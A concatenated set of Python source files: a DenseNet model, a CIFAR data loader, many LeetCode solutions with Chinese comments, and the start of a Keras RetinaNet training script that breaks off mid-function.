num_planes = out_planes
self.dense2 = self._make_dense_layers(block, num_planes, num_block[1])
num_planes += num_block[1] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans2 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense3 = self._make_dense_layers(block, num_planes, num_block[2])
num_planes += num_block[2] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans3 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense4 = self._make_dense_layers(block, num_planes, num_block[3])
num_planes += num_block[3] * growth_rate
self.bn = nn.BatchNorm2d(num_planes)
self.linear = nn.Linear(num_planes, num_classes)
def _make_dense_layers(self, block, in_planes, num_block):
layers = []
for i in range(num_block):
layers.append(block(in_planes, self.growth_rate))
in_planes += self.growth_rate
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.trans1(self.dense1(x))
x = self.trans2(self.dense2(x))
x = self.trans3(self.dense3(x))
x = self.dense4(x)
x = F.avg_pool2d(F.relu(self.bn(x)), 4)
x = x.view(x.size(0), -1)
x = self.linear(x)
return x
def DenseNet121():
return DenseNet(Bottleneck, [6, 12, 24, 16], growth_rate=32)
def DenseNet169():
return DenseNet(Bottleneck, [6, 12, 32, 32], growth_rate=32)
def DenseNet201():
return DenseNet(Bottleneck, [6, 12, 48, 32], growth_rate=32)
def DenseNet161():
return DenseNet(Bottleneck, [6, 12, 36, 24], growth_rate=48)
def densenet_cifar():
return DenseNet(Bottleneck, [6, 12, 24, 16], growth_rate=12)
# def load_checkpoint(model, checkpoint_path):
# """
# Loads weights from checkpoint
# :param model: a pytorch nn student
# :param str checkpoint_path: address/path of a file
# :return: pytorch nn student with weights loaded from checkpoint
# """
# model_ckp = torch.load(checkpoint_path)
# model.load_state_dict(model_ckp['model_state_dict'])
# return model
def count_parameters_in_MB(model):
return np.sum(np.prod(v.size()) for name, v in model.named_parameters() if "auxiliary" not in name) / 1e6
``` |
{
"source": "Joey61Liuyi/Teacher-Assistant-Knowledge-Distillation",
"score": 3
} |
#### File: Joey61Liuyi/Teacher-Assistant-Knowledge-Distillation/data_loader.py
```python
import torch
import torchvision
import torchvision.transforms as transforms
NUM_WORKERS = 2
def get_cifar(num_classes=100, dataset_dir='./data', batch_size=20, crop=False):
"""
:param num_classes: 10 for cifar10, 100 for cifar100
:param dataset_dir: location of datasets, default is a directory named 'data'
:param batch_size: batchsize, default to 128
:param crop: whether or not use randomized horizontal crop, default to False
:return:
"""
normalize = transforms.Normalize(mean=[0.507, 0.487, 0.441], std=[0.267, 0.256, 0.276])
simple_transform = transforms.Compose([transforms.ToTensor(), normalize])
if crop is True:
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
])
else:
train_transform = simple_transform
if num_classes == 100:
trainset = torchvision.datasets.CIFAR100(root=dataset_dir, train=True,
download=True, transform=train_transform)
testset = torchvision.datasets.CIFAR100(root=dataset_dir, train=False,
download=True, transform=simple_transform)
else:
trainset = torchvision.datasets.CIFAR10(root=dataset_dir, train=True,
download=True, transform=train_transform)
testset = torchvision.datasets.CIFAR10(root=dataset_dir, train=False,
download=True, transform=simple_transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, num_workers=NUM_WORKERS,
pin_memory=True, shuffle=True)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, num_workers=NUM_WORKERS,
pin_memory=True, shuffle=False)
return trainloader, testloader
if __name__ == "__main__":
print("CIFAR10")
print(get_cifar(10))
print("---"*20)
print("---"*20)
print("CIFAR100")
print(get_cifar(100))
``` |
{
"source": "joey66666/Codeyard",
"score": 4
} |
#### File: Codeyard/Leetcode-cn/1002.查找共用字符.py
```python
class Solution:
def commonChars(self, words: List[str]) -> List[str]:
if not words:
return []
alphabet1 = [0] * 26
n = len(words)
res = []
for w in words[0]:
alphabet1[ord(w) - ord('a')] += 1
for i in range(1, n):
alphabet2 = [0] * 26
for w in words[i]:
alphabet2[ord(w) - ord('a')] += 1
for j in range(26):
alphabet1[j] = min(alphabet1[j], alphabet2[j])
for i in range(26):
while alphabet1[i] > 0:
res.append(chr(ord('a') + i))
alphabet1[i] -= 1
return res
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/137.只出现一次的数字-ii.py
```python
class Solution:
def singleNumber(self, nums: List[int]) -> int:
dic = {}
for num in nums:
dic[num] = dic.get(num, 0) + 1
if dic[num] > 1:
continue
for d in dic:
if dic[d] == 1:
return d
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/1436.旅行终点站.py
```python
class Solution:
def destCity(self, paths: List[List[str]]) -> str:
dic = {}
for path in paths:
dic[path[0]] = path[1]
d = dic[paths[0][0]]
while d in dic.keys():
d = dic[d]
return d
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/1442.形成两个异或相等数组的三元组数目.py
```python
class Solution:
def countTriplets(self, arr: List[int]) -> int:
total = 0
n = len(arr)
for i in range(n - 1):
xor = arr[i]
for j in range(i + 1, n):
xor ^= arr[j]
if xor == 0:
total += (j - i)
return total
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/162.寻找峰值.py
```python
class Solution:
def findPeakElement(self, nums: List[int]) -> int:
left, right = 0, len(nums) - 1
while left < right:
mid = (left + right) // 2
if nums[mid] > nums[mid + 1]:
right = mid
else:
left = mid + 1
return right
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/171.excel表列序号.py
```python
class Solution:
def titleToNumber(self, columnTitle: str) -> int:
n = len(columnTitle)
if n == 0:
return n
res = 0
for index, title in enumerate(columnTitle):
res *= 26
res += (ord(title) - ord('A') + 1)
return res
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/1818.绝对差值和.py
```python
class Solution:
def minAbsoluteSumDiff(self, nums1: List[int], nums2: List[int]) -> int:
def biSec(nums: List[int], target: int) -> int:
left, right = 0, len(nums) - 1
while left <= right:
mid = (left + right) // 2
if nums[mid] == target:
return mid
elif nums[mid] < target:
left = mid + 1
else:
right = mid - 1
return left
if nums1 == nums2:
return 0
sortNums, n, res, ma, MOD = sorted(nums1), len(nums1), 0, 0, 10 ** 9 + 7
for i in range(n):
num1, num2 = nums1[i], nums2[i]
diff = abs(num1 - num2)
res = (res + diff) % MOD
target = biSec(sortNums, num2)
# target > 0,先看小一位的情况
if target > 0:
ma = max(ma, diff - abs(num2 - sortNums[target - 1]))
# 再看大一位的情况
if target < n:
ma = max(ma, diff - abs(sortNums[target] - num2))
return (res - ma + MOD) % MOD
# 2. Solution2, 库函数二分, Time: O(nlogn), Sapce: O(n), Runtime: 85%
class Solution:
def minAbsoluteSumDiff(self, nums1: List[int], nums2: List[int]) -> int:
if nums1 == nums2:
return 0
sortNums, n, res, ma, MOD = sorted(nums1), len(nums1), 0, 0, 10 ** 9 + 7
for i in range(n):
num1, num2 = nums1[i], nums2[i]
diff = abs(num1 - num2)
res = (res + diff) % MOD
target = bisect.bisect_left(sortNums, num2)
# target > 0,先看小一位的情况
if target > 0:
ma = max(ma, diff - abs(num2 - sortNums[target - 1]))
# 再看大一位的情况
if target < n:
ma = max(ma, diff - abs(sortNums[target] - num2))
return (res - ma + MOD) % MOD
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/1.两数之和.py
```python
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
dic = {}
for k, v in enumerate(nums):
if v not in dic:
dic[v] = k
t = target - v
if t in dic and dic[t] != k:
return [k, dic[t]]
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/215.数组中的第k个最大元素.py
```python
class Solution:
def findKthLargest(self, nums: List[int], k: int) -> int:
n = len(nums)
if n == 0:
return n
nums = sorted(nums)
return nums[-k]
# 2. Solution2, 使用自带堆, Time: O(n), Space: O(n), Runtime: 91%
# - 开销是构建堆和在堆查找的开销
class Solution:
def findKthLargest(self, nums: List[int], k: int) -> int:
heapq.heapify(nums)
return heapq.nlargest(k, nums)[k - 1]
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/235.二叉搜索树的最近公共祖先.py
```python
class Solution:
def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':
if not root:
return root
if p.val < root.val and q.val < root.val:
return self.lowestCommonAncestor(root.left, p, q)
elif p.val > root.val and q.val > root.val:
return self.lowestCommonAncestor(root.right, p, q)
else:
return root
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/240.搜索二维矩阵-ii.py
```python
class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
rows, cols = len(matrix), len(matrix[0])
for row in range(rows):
if matrix[row][0] <= target <= matrix[row][cols - 1]:
left, right = 0, cols - 1
while left <= right:
if matrix[row][left] == target or matrix[row][right] == target:
return True
left += 1
right -= 1
return False
"""
2. Solution2, 行列双指针, Time: O(logmlogn), Space: O(1), Runtime: 97%
- 纵向确定上下range,再对range内每行左右双指针往中间遍历
"""
class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
rows, cols = len(matrix), len(matrix[0])
low, high = 0, rows - 1
while matrix[low][0] > target and low < rows - 1:
low += 1
while matrix[high][0] > target and high > 0:
high -= 1
for row in range(low, high + 1):
if matrix[row][0] <= target <= matrix[row][cols - 1]:
left, right = 0, cols - 1
while left <= right:
if matrix[row][left] == target or matrix[row][right] == target:
return True
left += 1
right -= 1
return False
"""
3. Solution3, Z型遍历, Time: O(m + n), Space: O(1), Runtime: 93%
- 从右上角往左下角遍历
- `matrix[i][j] == target: return True`
- `matrix[i][j] > target`,因为每列为ascending,所以`matrix[i][j]`所在列都 `> target`, 所以向左移一列
- `matrix[i][j] < target`,因为每行为ascending,所以`matrix[i][j]`所在行都 `< target`, 所以向下移一行
"""
class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
rows, cols = len(matrix), len(matrix[0])
i, j = 0, cols - 1
while i < rows and j >= 0:
if matrix[i][j] == target:
return True
elif matrix[i][j] > target:
j -= 1
else:
i += 1
return False
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/273.整数转换英文表示.py
```python
class Solution:
def numberToWords(self, num: int) -> str:
singles = ["", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine"]
teens = ["Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen"]
tens = ["", "Ten", "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety"]
thousand = ["", "Thousand", "Million", "Billion"]
if num == 0:
return "Zero"
def toEnglish(num: int) -> str:
s = ""
if num >= 100:
s += singles[num // 100] + " Hundred "
num %= 100
if num >= 20:
s += tens[num // 10] + " "
num %= 10
if num >= 10:
s += teens[num - 10] + " "
if 0 < num < 10:
s += singles[num] + " "
return s
s = ""
divid = int(1e9)
for i in range(3, -1, -1):
curNum = num // divid
if curNum:
num -= curNum * divid
s += toEnglish(curNum) + thousand[i] + " "
divid //= 1000
return s.strip()
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/345.反转字符串中的元音字母.py
```python
class Solution:
def reverseVowels(self, s: str) -> str:
vowel, n = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'], len(s)
i, j, sList = 0, n - 1, list(s)
while i < j:
while i < n and sList[i] not in vowel:
i += 1
while j > 0 and sList[j] not in vowel:
j -= 1
if i < j:
sList[i], sList[j] = sList[j], sList[i]
i += 1
j -= 1
return "".join(sList)
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/363.矩形区域不超过-k-的最大数值和.py
```python
class Solution:
def maxSumSubmatrix(self, matrix: List[List[int]], k: int) -> int:
ans = float("-inf")
m, n = len(matrix), len(matrix[0])
for i in range(m): # 枚举上边界
total = [0] * n
for j in range(i, m): # 枚举下边界
for c in range(n):
total[c] += matrix[j][c] # 更新每列的元素和
totalSet = SortedList([0])
s = 0
for v in total:
s += v # s: 矩阵和
lb = totalSet.bisect_left(s - k)
if lb != len(totalSet):
ans = max(ans, s - totalSet[lb])
totalSet.add(s)
return ans
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/50.pow-x-n.py
```python
class Solution:
def myPow(self, x: float, n: int) -> float:
if n < 0:
x = 1 / x
n = -n
pow = 1
while n:
if n & 1:
pow *= x
x *= x
n >>= 1
return pow
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/554.砖墙.py
```python
class Solution:
def leastBricks(self, wall: List[List[int]]) -> int:
dic = {}
rows = len(wall)
for i in range(rows):
distance = 0
for col in range(len(wall[i]) - 1):
distance += wall[i][col]
dic[distance] = dic.get(distance, 0) + 1
big = 0
for k in dic:
big = max(big, dic[k])
return rows - big
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/581.最短无序连续子数组.py
```python
class Solution:
def findUnsortedSubarray(self, nums: List[int]) -> int:
n, start, end = len(nums), 0, 0
nMax, nMin = -float('inf'), float('inf')
for i in range(n):
# 右边界,每出现比最大值小的,就更新右边界
if nums[i] < nMax:
end = i
else:
nMax = nums[i]
# 左边界,每出现比最小值大的,就更新左边界
if nums[n - i - 1] > nMin:
start = n - i - 1
else:
nMin = nums[n - i - 1]
return 0 if start == end else end - start + 1
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/633.平方数之和.py
```python
class Solution:
def judgeSquareSum(self, c: int) -> bool:
left, right = 0, int(c ** 0.5) + 1
while left <= right:
t = left ** 2 + right ** 2
if t > c:
right -= 1
elif t < c:
left += 1
else:
return True
return False
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/690.员工的重要性.py
```python
class Solution:
def getImportance(self, employees: List['Employee'], id: int) -> int:
dic = {}
for e in employees:
dic[e.id] = e
res = dic[id].importance
subs = dic[id].subordinates
while len(subs) != 0:
sub = subs.pop()
res += dic[sub].importance
subs.extend(dic[sub].subordinates)
return res
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/743.网络延迟时间.py
```python
class Solution:
def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:
matrix = [[float('inf')] * n for _ in range(n)]
# 构建邻接矩阵
for x, y, time in times:
matrix[x - 1][y - 1] = time
# 每个点到源点的距离
dis = [float('inf')] * n
dis[k - 1] = 0
# 每个点是否访问过
visited = [False] * n
for _ in range(n):
# 找到距离源点最近的点
x = -1
for index, v in enumerate(visited):
if not v and (x == -1 or dis[index] < dis[x]):
x = index
visited[x] = True
for index, time in enumerate(matrix[x]):
dis[index] = min(dis[index], dis[x] + time)
res = max(dis)
return res if res < float('inf') else -1
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/7.整数反转.py
```python
class Solution:
def reverse(self, x: int) -> int:
res = 0
if x > 0:
flag = 1
elif x < 0:
flag = -1
else:
return 0
x = abs(x)
while x != 0:
res = res * 10 + x % 10
x //= 10
res = flag * res
if (res > (2 ** 31) - 1) or (res < -(2 ** 31)):
return 0
else:
return res
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/802.找到最终的安全状态.py
```python
class Solution:
def eventualSafeNodes(self, graph: List[List[int]]) -> List[int]:
reversedGraph = [[] for _ in graph]
for i, ys in enumerate(graph):
for y in ys:
reversedGraph[y].append(i)
inDeg = [len(ys) for ys in graph]
q = deque([i for i, d in enumerate(inDeg) if d == 0])
while q:
for i in reversedGraph[q.popleft()]:
inDeg[i] -= 1
if inDeg[i] == 0:
q.append(i)
return [i for i, d in enumerate(inDeg) if d == 0]
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/863.二叉树中所有距离为-k-的结点.py
```python
class Solution:
def distanceK(self, root: TreeNode, target: TreeNode, k: int) -> List[int]:
dic, res = {}, []
def dfs(node: TreeNode):
if not node:
return
if node.left:
dic[node.left.val] = node
dfs(node.left)
if node.right:
dic[node.right.val] = node
dfs(node.right)
def findTarget(node: TreeNode, fromNode: TreeNode, depth: int):
if not node:
return
if depth == 0:
res.append(node.val)
return
if node.left and node.left != fromNode:
findTarget(node.left, node, depth - 1)
if node.right and node.right != fromNode:
findTarget(node.right, node, depth - 1)
if node.val in dic and dic[node.val] != fromNode:
findTarget(dic[node.val], node, depth - 1)
dfs(root)
findTarget(target, TreeNode(-1), k)
return res
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/872.叶子相似的树.py
```python
class Solution:
def leafSimilar(self, root1: TreeNode, root2: TreeNode) -> bool:
a, b = [], []
self.traverse(root1, a)
self.traverse(root2, b)
return a == b
def traverse(self, node: TreeNode, res: List[int]):
# if not node:
# return
if node.left:
self.traverse(node.left, res)
if node.right:
self.traverse(node.right, res)
if node and (not node.left) and (not node.right):
res.append(node.val)
return
return
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/91.解码方法.py
```python
class Solution:
def numDecodings(self, s: str) -> int:
n = len(s)
if n == 0:
return 1
a, b, c = 0, 1, 0 # i-2, i-1, i
for i in range(1, n + 1):
c = 0
if s[i - 1] != "0":
c += b
if i > 1 and s[i - 2] != "0" and int(s[i - 2:i]) < 27:
c += a
a, b = b, c
return c
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/剑指 Offer 10- I. 斐波那契数列.py
```python
# 提示:
# 0 <= n <= 100
# 1. Solution1, DP,Time: O(n), Space: O(1), Runtime: 89%
# - dp[i] = dp[i - 1] + dp[i - 2]
# - 状态只取最近的三个,用三个变量表示
class Solution:
def fib(self, n: int) -> int:
MOD = 10 ** 9 + 7
a, b, c = 0, 1, 0
if n < 2:
return n
for i in range(2, n + 1):
c = (a + b) % MOD
a, b = b, c
return c
``` |
{
"source": "joey66666/vehicle-classify",
"score": 2
} |
#### File: keras_retinanet/bin/train_fc.py
```python
import argparse
import os
import sys
import warnings
import keras
import keras.preprocessing.image
import tensorflow as tf
# Allow relative imports when being executed as script.
if __name__ == "__main__" and __package__ is None:
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..'))
import keras_retinanet.bin # noqa: F401
__package__ = "keras_retinanet.bin"
# Change these to absolute imports if you copy this script outside the keras_retinanet package.
from .. import layers # noqa: F401
from .. import losses_fc
from .. import models
from ..callbacks import RedirectModel
from ..callbacks.eval import Evaluate
from ..models.retinanet_fc import retinanet_bbox
from ..preprocessing.csv_generator import CSVGenerator
from ..preprocessing.kitti import KittiGenerator
from ..preprocessing.open_images import OpenImagesGenerator
from ..preprocessing.pascal_voc import PascalVocGenerator
from ..utils.anchors import make_shapes_callback
from ..utils.config import read_config_file, parse_anchor_parameters
from ..utils.keras_version import check_keras_version
from ..utils.model import freeze as freeze_model
from ..utils.transform import random_transform_generator
def makedirs(path):
# Intended behavior: try to create the directory,
# pass if the directory exists already, fails otherwise.
# Meant for Python 2.7/3.n compatibility.
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
def get_session():
""" Construct a modified tf session.
"""
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
return tf.Session(config=config)
def model_with_weights(model, weights, skip_mismatch):
""" Load weights for model.
Args
model : The model to load weights for.
weights : The weights to load.
skip_mismatch : If True, skips layers whose shape of weights doesn't match with the model.
"""
if weights is not None:
model.load_weights(weights, by_name=True, skip_mismatch=skip_mismatch)
return model
def create_models(backbone_retinanet, num_classes, weights, multi_gpu=0,
freeze_backbone=False, lr=1e-5, config=None):
""" Creates three models (model, training_model, prediction_model).
Args
backbone_retinanet : A function to call to create a retinanet model with a given backbone.
num_classes : The number of classes to train.
weights : The weights to load into the model.
multi_gpu : The number of GPUs to use for training.
freeze_backbone : If True, disables learning for the backbone.
config : Config parameters, None indicates the default configuration.
Returns
model : The base model. This is also the model that is saved in snapshots.
training_model : The training model. If multi_gpu=0, this is identical to model.
prediction_model : The model wrapped with utility functions to perform object detection (applies regression values and performs NMS).
"""
modifier = freeze_model if freeze_backbone else None
# load anchor parameters, or pass None (so that defaults will be used)
anchor_params = None
num_anchors = None
if config and 'anchor_parameters' in config:
anchor_params = parse_anchor_parameters(config)
num_anchors = anchor_params.num_anchors()
# Keras recommends initialising a multi-gpu model on the CPU to ease weight sharing, and to prevent OOM errors.
# optionally wrap in a parallel model
if multi_gpu > 1:
from keras.utils import multi_gpu_model
with tf.device('/cpu:0'):
model = model_with_weights(backbone_retinanet(num_classes, num_anchors=num_anchors, modifier=modifier), weights=weights, skip_mismatch=True)
training_model = multi_gpu_model(model, gpus=multi_gpu)
else:
model = model_with_weights(backbone_retinanet(num_classes, num_anchors=num_anchors, modifier=modifier), weights=weights, skip_mismatch=True)
training_model = model
# make prediction model
prediction_model = retinanet_bbox(model=model, anchor_params=anchor_params)
# compile model
training_model.compile(
loss={
'regression' : losses_fc.smooth_l1(),
'classification': losses_fc.focal(),
'choose': losses_fc.smooth_l1()
},
optimizer=keras.optimizers.adam(lr=lr, clipnorm=0.001)
)
return model, training_model, prediction_model
def create_callbacks(model, training_model, prediction_model, validation_generator, args):
""" Creates the callbacks to use during training.
Args
model: The base model.
training_model: The model that is used for training.
prediction_model: The model that should be used for validation.
validation_generator: The generator for creating validation data.
args: parseargs args object.
Returns:
A list of callbacks used for training.
"""
callbacks = []
tensorboard_callback = None
if args.tensorboard_dir:
tensorboard_callback = keras.callbacks.TensorBoard(
log_dir = args.tensorboard_dir,
histogram_freq = 0,
batch_size = args.batch_size,
write_graph = True,
write_grads = False,
write_images = False,
embeddings_freq = 0,
embeddings_layer_names = None,
embeddings_metadata = None
)
callbacks.append(tensorboard_callback)
if args.evaluation and validation_generator:
if args.dataset_type == 'coco':
from ..callbacks.coco import CocoEval
# use prediction model for evaluation
evaluation = CocoEval(validation_generator, tensorboard=tensorboard_callback)
else:
evaluation = Evaluate(validation_generator, tensorboard=tensorboard_callback, weighted_average=args.weighted_average)
evaluation = RedirectModel(evaluation, prediction_model)
callbacks.append(evaluation)
# save the model
if args.snapshots:
# ensure directory created first; otherwise h5py will error after epoch.
makedirs(args.snapshot_path)
checkpoint = keras.callbacks.ModelCheckpoint(
os.path.join(
args.snapshot_path,
'{backbone}_{dataset_type}_{{epoch:02d}}.h5'.format(backbone=args.backbone, dataset_type=args.dataset_type)
),
verbose=1,
# save_best_only=True,
# monitor="mAP",
# mode='max'
)
checkpoint = RedirectModel(checkpoint, model)
callbacks.append(checkpoint)
callbacks.append(keras.callbacks.ReduceLROnPlateau(
monitor = 'loss',
factor = 0.1,
patience = 2,
verbose = 1,
mode = 'auto',
min_delta = 0.0001,
cooldown = 0,
min_lr = 0
))
return callbacks
def create_generators(args, preprocess_image):
""" Create generators for training and validation.
Args
args : parseargs object containing configuration for generators.
preprocess_image : Function that preprocesses an image for the network.
"""
common_args = {
'batch_size' : args.batch_size,
'config' : args.config,
'image_min_side' : args.image_min_side,
'image_max_side' : args.image_max_side,
'preprocess_image' : preprocess_image,
}
# create random transform generator for augmenting training data
if args.random_transform:
transform_generator = random_transform_generator(
min_rotation=-0.1,
max_rotation=0.1,
min_translation=(-0.1, -0.1),
max_translation=(0.1, 0.1),
min_shear=-0.1,
max_shear=0.1,
min_scaling=(0.9, 0.9),
max_scaling=(1.1, 1.1),
flip_x_chance=0.5,
flip_y_chance=0.5,
)
else:
transform_generator = random_transform_generator(flip_x_chance=0.5)
if args.dataset_type == 'coco':
# import here to prevent unnecessary dependency on cocoapi
from ..preprocessing.coco import CocoGenerator
train_generator = CocoGenerator(
args.coco_path,
'train2017',
transform_generator=transform_generator,
**common_args
)
validation_generator = CocoGenerator(
args.coco_path,
'val2017',
**common_args
)
elif args.dataset_type == 'pascal':
train_generator = PascalVocGenerator(
args.pascal_path,
'trainval',
transform_generator=transform_generator,
**common_args
)
validation_generator = PascalVocGenerator(
args.pascal_path,
'test',
**common_args
)
elif args.dataset_type == 'csv':
train_generator = CSVGenerator(
args.annotations,
args.classes,
transform_generator=transform_generator,
**common_args
)
if args.val_annotations:
validation_generator = CSVGenerator(
args.val_annotations,
args.classes,
**common_args
)
else:
validation_generator = None
elif args.dataset_type == 'oid':
train_generator = OpenImagesGenerator(
args.main_dir,
subset='train',
version=args.version,
labels_filter=args.labels_filter,
annotation_cache_dir=args.annotation_cache_dir,
parent_label=args.parent_label,
transform_generator=transform_generator,
**common_args
)
validation_generator = OpenImagesGenerator(
args.main_dir,
subset='validation',
version=args.version,
labels_filter=args.labels_filter,
annotation_cache_dir=args.annotation_cache_dir,
parent_label=args.parent_label,
**common_args
)
elif args.dataset_type == 'kitti':
train_generator = KittiGenerator(
args.kitti_path,
subset='train',
transform_generator=transform_generator,
**common_args
)
validation_generator = KittiGenerator(
args.kitti_path,
subset='val',
**common_args
)
else:
raise ValueError('Invalid data type received: {}'.format(args.dataset_type))
return train_generator, validation_generator
def check_args(parsed_args):
""" Function to check for inherent contradictions within parsed arguments.
For example, batch_size < num_gpus
Intended to raise errors prior to backend initialisation.
Args
parsed_args: parser.parse_args()
Returns
parsed_args
"""
if parsed_args.multi_gpu > 1 and parsed_args.batch_size < parsed_args.multi_gpu:
raise ValueError(
"Batch size ({}) must be equal to or higher than the number of GPUs ({})".format(parsed_args.batch_size,
parsed_args.multi_gpu))
if parsed_args.multi_gpu > 1 and parsed_args.snapshot:
raise ValueError(
"Multi GPU training ({}) and resuming from snapshots ({}) is not supported.".format(parsed_args.multi_gpu,
parsed_args.snapshot))
if parsed_args.multi_gpu > 1 and not parsed_args.multi_gpu_force:
raise ValueError("Multi-GPU support is experimental, use at own risk! Run with --multi-gpu-force if you wish to continue.")
if 'resnet' not in parsed_args.backbone:
warnings.warn('Using experimental backbone {}. Only resnet50 has been properly tested.'.format(parsed_args.backbone))
return parsed_args
def parse_args(args):
""" Parse the arguments.
"""
parser = argparse.ArgumentParser(description='Simple training script for training a RetinaNet network.')
subparsers = parser.add_subparsers(help='Arguments for specific dataset types.', dest='dataset_type')
subparsers.required = True
coco_parser = subparsers.add_parser('coco')
coco_parser.add_argument('coco_path', help='Path to dataset directory (ie. /tmp/COCO).')
pascal_parser = subparsers.add_parser('pascal')
pascal_parser.add_argument('pascal_path', help='Path to dataset directory (ie. /tmp/VOCdevkit).')
kitti_parser = subparsers.add_parser('kitti')
kitti_parser.add_argument('kitti_path', help='Path to dataset directory (ie. /tmp/kitti).')
def csv_list(string):
return string.split(',')
oid_parser = subparsers.add_parser('oid')
oid_parser.add_argument('main_dir', help='Path to dataset directory.')
oid_parser.add_argument('--version', help='The current dataset version is v4.', default='v4')
oid_parser.add_argument('--labels-filter', help='A list of labels to filter.', type=csv_list, default=None)
oid_parser.add_argument('--annotation-cache-dir', help='Path to store annotation cache.', default='.')
oid_parser.add_argument('--parent-label', help='Use the hierarchy children of this label.', default=None)
csv_parser = subparsers.add_parser('csv')
csv_parser.add_argument('annotations', help='Path to CSV file containing annotations for training.')
csv_parser.add_argument('classes', help='Path to a CSV file containing class label mapping.')
csv_parser.add_argument('--val-annotations', help='Path to CSV file containing annotations for validation (optional).')
group = parser.add_mutually_exclusive_group()
group.add_argument('--snapshot', help='Resume training from a snapshot.')
group.add_argument('--imagenet-weights', help='Initialize the model with pretrained imagenet weights. This is the default behaviour.', action='store_const', const=True, default=True)
group.add_argument('--weights', help='Initialize the model with weights from a file.')
group.add_argument('--no-weights', help='Don\'t initialize the model with any weights.', dest='imagenet_weights', action='store_const', const=False)
parser.add_argument('--backbone', help='Backbone model used by retinanet.', default='resnet50', type=str)
parser.add_argument('--batch-size', help='Size of the batches.', default=1, type=int)
parser.add_argument('--gpu', help='Id of the GPU to use (as reported by nvidia-smi).')
parser.add_argument('--multi-gpu', help='Number of GPUs to use for parallel processing.', type=int, default=0)
parser.add_argument('--multi-gpu-force', help='Extra flag needed to enable (experimental) multi-gpu support.', action='store_true')
parser.add_argument('--epochs', help='Number of epochs to train.', type=int, default=50)
parser.add_argument('--steps', help='Number of steps per epoch.', type=int, default=10000)
parser.add_argument('--lr', help='Learning rate.', type=float, default=1e-5)
parser.add_argument('--snapshot-path', help='Path to store snapshots of models during training (defaults to \'./snapshots\')', default='./snapshots')
parser.add_argument('--tensorboard-dir', help='Log directory for Tensorboard output', default='./logs')
parser.add_argument('--no-snapshots', help='Disable saving snapshots.', dest='snapshots', action='store_false')
parser.add_argument('--no-evaluation', help='Disable per epoch evaluation.', dest='evaluation', action='store_false')
parser.add_argument('--freeze-backbone', help='Freeze training of backbone layers.', action='store_true')
parser.add_argument('--random-transform', help='Randomly transform image and annotations.', action='store_true')
parser.add_argument('--image-min-side', help='Rescale the image so the smallest side is min_side.', type=int, default=800)
parser.add_argument('--image-max-side', help='Rescale the image if the largest side is larger than max_side.', type=int, default=1333)
parser.add_argument('--config', help='Path to a configuration parameters .ini file.')
parser.add_argument('--weighted-average', help='Compute the mAP using the weighted average of precisions among classes.', action='store_true')
# Fit generator arguments
parser.add_argument('--workers', help='Number of multiprocessing workers. To disable multiprocessing, set workers to 0', type=int, default=1)
parser.add_argument('--max-queue-size', help='Queue length for multiprocessing workers in fit generator.', type=int, default=10)
return check_args(parser.parse_args(args))
def main(args=None):
# parse arguments
if args is None:
args = sys.argv[1:]
args = parse_args(args)
# create object that stores backbone information
backbone = models.backbone(args.backbone)
# make sure keras is the minimum required version
check_keras_version()
# optionally choose specific GPU
if args.gpu:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
keras.backend.tensorflow_backend.set_session(get_session())
# optionally load config parameters
if args.config:
args.config = read_config_file(args.config)
# create the generators
train_generator, validation_generator = create_generators(args, backbone.preprocess_image)
# create the model
if args.snapshot is not None:
print('Loading model, this may take a second...')
model = models.load_model(args.snapshot, backbone_name=args.backbone)
training_model = model
anchor_params = None
if args.config and 'anchor_parameters' in args.config:
anchor_params = parse_anchor_parameters(args.config)
prediction_model = retinanet_bbox(model=model, anchor_params=anchor_params)
else:
weights = args.weights
# default to imagenet if nothing else is specified
if weights is None and args.imagenet_weights:
weights = backbone.download_imagenet()
print('Creating model, this may take a second...')
model, training_model, prediction_model = create_models(
